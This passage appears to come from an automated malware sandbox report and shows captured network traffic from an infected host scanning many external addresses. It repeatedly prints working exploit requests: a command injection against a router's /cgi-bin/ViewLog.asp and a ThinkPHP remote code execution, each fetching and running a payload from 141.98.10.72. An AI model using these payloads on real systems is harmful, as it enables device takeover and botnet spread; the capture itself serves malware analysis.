                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.735620022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      292192.168.2.155860494.120.211.1278080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.272536993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      293192.168.2.155474231.13.88.498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.329824924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      294192.168.2.155502294.126.8.468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.465790033 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.707622051 CET313INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      295192.168.2.155270494.120.22.1038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.519922972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      296192.168.2.154207294.123.108.1468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.519925117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      297192.168.2.154521862.29.25.1258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.520081997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      298192.168.2.155176694.122.91.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.521599054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      299192.168.2.155709062.29.93.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.521775961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      300192.168.2.155940494.190.214.1588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.740346909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      301192.168.2.154816295.101.187.6180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:35.282738924 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:35.485419989 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 62 36 62 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 34 64 65 64 35 65 35 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6b6b7b5c&#46;1707899375&#46;4ded5e59</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      302192.168.2.154320495.101.221.6680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:35.298891068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:35.517512083 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 30 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 31 37 30 64 65 39 34 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;600b1502&#46;1707899375&#46;170de946</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      303192.168.2.156037295.216.160.15080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:35.305382013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:35.531567097 CET663INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Server: OpenBSD httpd
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Content-Length: 498
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 43 6f 6d 69 63 20 53 61 6e 73 20 4d 53 27 2c 20 27 43 68 61 6c 6b 62 6f 61 72 64 20 53 45 27 2c 20 27 43 6f 6d 69 63 20 4e 65 75 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 68 72 20 7b 20 62 6f 72 64 65 72 3a 20 30 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 3b 20 7d 0a 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 20 7b 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 45 31 46 32 31 3b 20 63 6f 6c 6f 72 3a 20 23 45 45 45 46 46 31 3b 20 7d 0a 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 42 41 44 37 46 46 3b 20 7d 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 4f 70 65 6e 42 53 44 20 68 74 74 70 64 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><title>400 Bad Request</title><style type="text/css">...body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }hr { border: 0; border-bottom: 1px dashed; }@media (prefers-color-scheme: dark) {body { background-color: #1E1F21; color: #EEEFF1; }a { color: #BAD7FF; }}--></style></head><body><h1>400 Bad Request</h1><hr><address>OpenBSD httpd</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      304192.168.2.155769895.101.14.8680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:35.314522982 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:35.549083948 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 64 66 33 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 31 36 63 66 31 34 31 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;47df3a17&#46;1707899375&#46;16cf1411</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      305192.168.2.154536431.136.222.238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.323456049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.953922033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.201913118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:40.889852047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.009800911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:55.993462086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:16.728864908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687884092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      306192.168.2.154891895.248.153.1528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.347821951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
